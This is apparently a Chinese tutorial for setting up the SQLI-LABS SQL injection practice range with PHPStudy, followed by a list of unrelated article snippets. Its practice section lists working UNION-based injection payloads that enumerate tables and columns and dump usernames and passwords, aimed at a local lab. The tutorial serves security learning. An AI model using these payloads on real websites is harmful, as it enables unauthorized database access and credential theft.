SQL注入练习场:PHPStudy+SQLI-LABS靶场搭建教程(零基础友好版)
注意:文中涉及演示均为模拟测试,切勿用于真实环境,任何未授权测试都是违法行为!
一、环境准备
- 下载PHPStudy
官网下载地址:https://www.xp.cn/php-study(选择Windows版)
安装时建议选择自定义路径(如 D:\phpstudy_pro),避免系统盘权限问题
- 下载SQLI-LABS源码
从GitHub获取源码包:https://github.com/Audi-1/sqli-labs
下载完成后解压,将文件夹重命名为sqli-labs(避免中文路径)。
二、PHPStudy配置
- 启动基础服务
打开PHPStudy,启动Apache和MySQL服务(图2:服务启动界面)。
若MySQL启动失败,检查端口是否被占用(默认3306)。
- 切换PHP版本
点击左侧菜单【网站】→ 选择【管理】→【PHP版本】→更多→ 安装PHP5.5.9(SQLI-LABS不支持PHP7+)。
切换后需重启Apache服务(图3:PHP版本切换界面)。
三、部署SQLI-LABS靶场
-
放置源码文件
将sqlilabs文件夹复制到PHPStudy的网站根目录(默认路径:D:\phpstudy_pro\WWW)。 -
配置数据库连接
打开文件sqlilabs/sql-connections/db-creds.inc,修改以下参数:$dbuser = 'root'; // 数据库用户名(默认) $dbpass = 'root'; // 数据库密码(若未修改则为空)
四、初始化靶场数据库
- 访问靶场页面
浏览器输入http://localhost/sqli-labs/,进入SQLI-LABS首页。
点击页面中的Setup/reset Database for labs链接
- 验证初始化结果
若显示Congratulations! Database is connected...,表示数据库创建成功。
若报错mysql_connect() undefined,需检查PHP版本是否为5.x 。
五、开始注入练习
- 选择关卡
返回首页点击Less-1(基础注入关卡),通过URL参数?id=1测试注入点。
示例Payload:?id=1' and 1=2 union select 1,2,3 --+查看显示位
?id=1' and 1=2 union select 1,2,database()--+显示出数据库名
?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
查看数据库的所有表
?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+查看users表中的字段
?id=1' and 1=2 union select 1,2,group_concat(username,0x7e,password) from security.users --+查看全部用户名和密码
还可以下载phpmyadmin管理数据库
2. 常见问题排查
数据库连接失败:检查db-creds.inc密码是否与PHPStudy的MySQL一致。
页面无法访问:确认sqlilabs文件夹是否位于WWW目录,且Apache端口未被占用。
相关文章:
SQL注入练习场:PHPStudy+SQLI-LABS靶场搭建教程(零基础友好版)
注意:文中涉及演示均为模拟测试,切勿用于真实环境,任何未授权测试都是违法行为! 一、环境准备 下载PHPStudy 官网下载地址:https://www.xp.cn/php-study(选择Windows版) 安装时建议选择自定…...
【笔记ing】python
1 Python基础概念及环境搭建 1.1 python简介及发展史 之父Guido van Rossum。ABC语言的替代品。Python提供了高效的数据结构,还能简单有效地面向对象编程。Python语法和动态类型,以及解释性语言的本质,使之成为多数平台上写脚本和快速开发应…...
DFT之SSN架构
SSN(Streaming Scan Network)架构在DFT(设计可测试性)中的应用是一种先进的设计测试解决方案,旨在应对现代大规模片上系统(SoC)设计中的复杂测试挑战。以下是对SSN架构在DFT中应用的详细分析&am…...
四十二:VSCODE打开新文件覆盖上一个文件窗口问题
VSCODE打开新文件覆盖上一个文件窗口问题_vscode enablepreview-CSDN博客...
JMeter 引入 JAR 包的几种方法
JMeter 支持加载外部 JAR 文件,用于: 扩展 JMeter 功能使用 Java 代码(BeanShell / JSR223)连接数据库 / 解析 Excel / 读取 CSV 📌 1. JMeter 引入 JAR 包的方式 ✅ 方式 1:将 JAR 放入 lib/ 或 lib/ext…...
记一次ScopeSentry搭建
介绍 Scope Sentry是一款具有资产测绘、子域名枚举、信息泄露检测、漏洞扫描、目录扫描、子域名接管、爬虫、页面监控功能的工具,通过构建多个节点,自由选择节点运行扫描任务。当出现新漏洞时可以快速排查关注资产是否存在相关组件。 目前功能 插件系…...
C语言_数据结构总结1:静态分配方式的顺序表
纯C语言代码,不涉及C 1. 初始化 #define MaxSize 50 typedef int ElemType; typedef struct SQList { ElemType data[MaxSize]; //定义一个数组存放顺序表元素 int length; //顺序表当前的长度(元素个数…...
C语言--简单排序算法(冒泡、选择、插入)
实现三种简单的排序算法 文章目录 冒泡排序改进改进2 选择排序插入排序执行结果 冒泡排序 每次外层循环,排出一个最大值 void bubbleSort(int arr[], int len) {for (int i 0; i < len - 1; i) {for (int j 0; j < len - i - 1; j) {if (arr[j] > arr[…...
【文献阅读】The Efficiency Spectrum of Large Language Models: An Algorithmic Survey
这篇文章发表于2024年4月 摘要 大语言模型(LLMs)的快速发展推动了多个领域的变革,重塑了通用人工智能的格局。然而,这些模型不断增长的计算和内存需求带来了巨大挑战,阻碍了学术研究和实际应用。为解决这些问题&…...
MySQL-高级查询
查询处理 排序(默认不是按主键排序的) order by 字段1[,字段2] [asc|desc] 默认是升序排序也可以指定 select 列表中列的序号进行排序如果是多个字段,那么在上一个字段排序完的基础上排序下一个 限制数量 limit 行数࿰…...
Netty笔记10:LengthFieldBasedFrameDecoder很简单,请看
Netty笔记1:线程模型 Netty笔记2:零拷贝 Netty笔记3:NIO编程 Netty笔记4:Epoll Netty笔记5:Netty开发实例 Netty笔记6:Netty组件 Netty笔记7:ChannelPromise通知处理 Netty笔记8:ByteBuf使用介绍 Netty笔记9:粘包半包 Netty笔记10:LengthFieldBasedFrameDec…...
linux 安装Mysql无法远程访问问题的排查
宝塔面板安装了mysql5.6后 只能本地访问 firewall 在使用宝塔面板(BT Panel)安装 MySQL 5.6 后,如果你发现 MySQL 只能本地访问,而不能从其他机器或服务访问,这通常是由于防火墙设置或 MySQL 配置的问题。以下是一些步…...
DeepSeek搭配Excel,制作自定义按钮,实现办公自动化!
今天跟大家分享下我们如何将DeepSeek生成的VBA代码,做成按钮,将其永久保存在我们的Excel表格中,下次遇到类似的问题,直接在Excel中点击按钮,就能10秒搞定,操作也非常的简单. 一、代码准备 代码可以直接询问…...
英文生物信息学技术社区Top10推荐:基本情况、评介和网页链接
英文生物信息学技术社区Top10推荐:基本情况、评介和网页链接 李升伟 一、思考与分析 生物信息学涉及生物数据分析和计算工具,所以相关的社区可能包括论坛、问答平台、资源库等等。 首先,我想到Biostars,这是一个比较知名的生物信…...
Lumerical INTERCONNECT 中的自相位调制 (SPM)
一、自相位调制的数学介绍 A.非线性薛定谔方程(NLSE): NLSE 是光学中的一个关键方程。它告诉我们光脉冲在具有非线性和色散特性的介质中的行为方式。该方程如下所示: i ∂A/∂z β2/2 ∂A/∂t γ|A|A 0 其中: - …...
每日定投40刀BTC(6)20250227 - 20250302
定投 得而复失 《得而复失》初得明珠喜欲狂,转瞬即逝心彷徨。得失之间悟真谛,淡看浮华守本常。...
leetcode 230. 二叉搜索树中第 K 小的元素
题目如下 数据范围 利用一个全局的计数器每过一个节点就加一,再利用中序遍历的特性(即遍历到的节点是从小到大的)通过代码 /*** Definition for a binary tree node.* struct TreeNode {* int val;* TreeNode *left;* TreeN…...
华为hcia——Datacom实验指南——配置手工模式以太网链路聚合
什么是以太网链路聚合(Eth-trunk) 是一种将多个物理链路捆绑在一起,让设备以为是一条大链路,能够增加带宽,增加冗余度,提升可靠性,实现负载平衡。 传输方式有两种 基于数据流传输和基于数据包…...
Metal学习笔记十一:贴图和材质
在上一章中,您设置了一个简单的 Phong 光照模型。近年来,研究人员在基于物理的渲染 (PBR) 方面取得了长足的进步。PBR 尝试准确表示真实世界的着色,真实世界中离开表面的光量小于表面接收的光量。在现实世界中…...
VirtualBox虚拟机MacOS从Big Sur升级到Sequoia(失败)
VirtualBox虚拟机里安装好Big Sur版本,尝试升级到Sequoia,但是最终失败了。 软件升级 直接在系统偏好-软件更新里可以看到提示,提示可以升级到15版本Sequoia 点击同意,看能不能升级到Sequoia吧。升级前先用时光做了备份。 升级…...
Cloudflare邮件路由的隐藏玩法:一个域名无限别名,管理不同网站注册,再也不怕信息泄露
Cloudflare邮件路由的隐私管理艺术:用无限别名打造数字身份防火墙 在个人信息如同裸奔的数字时代,每次网站注册都是一次隐私赌博。你是否经历过这样的困扰?某个小众论坛注册三个月后,主邮箱突然涌入大量赌博邮件;双十一…...
G-Helper:让华硕笔记本性能释放的轻量级硬件控制工具
G-Helper:让华硕笔记本性能释放的轻量级硬件控制工具 【免费下载链接】g-helper Lightweight Armoury Crate alternative for Asus laptops. Control tool for ROG Zephyrus G14, G15, G16, M16, Flow X13, Flow X16, TUF, Strix, Scar and other models 项目地址…...
人工智能入门全景图:Nanbeige 4.1-3B带你梳理AI核心概念与技术栈
人工智能入门全景图:Nanbeige 4.1-3B带你梳理AI核心概念与技术栈 你是不是也对人工智能充满好奇,但一看到那些复杂的术语和庞大的技术栈就感到无从下手?机器学习、深度学习、神经网络、NLP、CV……这些词听起来很酷,但它们到底是…...
别再手动复制数组了!用NumPy广播机制5分钟搞定形状不同的数组运算
NumPy广播机制:告别低效循环,用智能扩展提升数组运算效率 你是否曾在处理数据时遇到过这样的场景:需要将一个34的矩阵与一个14的行向量相加,结果却因为维度不匹配而报错?大多数Python初学者会本能地选择用循环或复制数…...
LFM2.5-1.2B-Thinking-GGUF快速上手:使用Ollama本地化部署与管理
LFM2.5-1.2B-Thinking-GGUF快速上手:使用Ollama本地化部署与管理 1. 前言:为什么选择Ollama部署本地大模型 最近大语言模型越来越火,但很多朋友发现云端服务要么太贵,要么有隐私顾虑。今天给大家介绍一个超简单的本地部署方案—…...
springboot-vue+nodejs的公考在线刷题学习平台的设计与实现
目录技术栈选择核心模块设计关键实现步骤扩展功能建议示例代码片段(Spring Boot Controller)注意事项项目技术支持源码获取详细视频演示 :文章底部获取博主联系方式!同行可合作技术栈选择 后端框架:Spring Boot&#…...
)
JIT编译延迟高达2.3秒?紧急修复Python 3.14.0b3中`--jit-threshold=0`参数失效Bug的3种绕行方案(含补丁级patch)
第一章:JIT编译延迟高达2.3秒?紧急修复Python 3.14.0b3中--jit-threshold0参数失效Bug的3种绕行方案(含补丁级patch) Python 3.14.0b3 引入的自适应JIT编译器在启用 --jit-threshold0 时未能立即触发热路径编译,导致首…...
使用LingBot-Depth优化Git版本控制中的3D模型管理
使用LingBot-Depth优化Git版本控制中的3D模型管理 1. 引言 在3D设计和游戏开发领域,版本控制一直是个头疼的问题。传统的Git系统擅长处理代码和文本文件,但面对3D模型这种二进制文件就显得力不从心了。每次修改模型后,你只能看到"文件…...
AI技术通过aibiye爱毕业等8款智能应用,显著提升了论文撰写与代码实现的效率,为毕业设计带来创新支持
文章总结表格(工具排名对比) 工具名称 核心优势 aibiye 精准降AIGC率检测,适配知网/维普等平台 aicheck 专注文本AI痕迹识别,优化人类表达风格 askpaper 快速降AI痕迹,保留学术规范 秒篇 高效处理混AIGC内容&…...
Rufus高效使用实战指南:精通ext2/ext3/ext4文件系统格式化
Rufus高效使用实战指南:精通ext2/ext3/ext4文件系统格式化 【免费下载链接】rufus The Reliable USB Formatting Utility 项目地址: https://gitcode.com/GitHub_Trending/ru/rufus 在Linux系统管理和开发工作中,USB设备的格式化与启动盘制作是一…...